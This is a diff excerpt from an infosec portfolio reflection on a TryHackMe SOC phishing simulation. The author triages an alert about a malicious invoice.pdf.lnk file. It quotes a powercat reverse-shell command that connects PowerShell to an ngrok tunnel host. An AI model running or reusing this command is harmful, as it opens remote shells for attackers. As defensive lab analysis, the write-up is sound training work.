V4641/InfoSec-Portfolio/Defensive/Soc-Simulator/THM Phishing Unfolding/Soc-Simulation-Reflection.md

 powercat -c 2.tcp.ngrok.io -p 19282 -e powershell
 ```

-I then triaged this low severity alert, classified it as a True Positive and escalated it to an imaginary Tier 2 Analyst (it is a simulation after all)
+I then triaged this low severity alert, classified it as a True Positive and escalated it to a 2 Analyst.

 ![invoice.pdf.lnk-findings](https://github.com/V4641/InfoSec-Portfolio/blob/main/Defensive/Soc-Simulator/THM%20Phishing%20Unfolding/Screenshots/Screenshot%202026-08-17%20205421.png)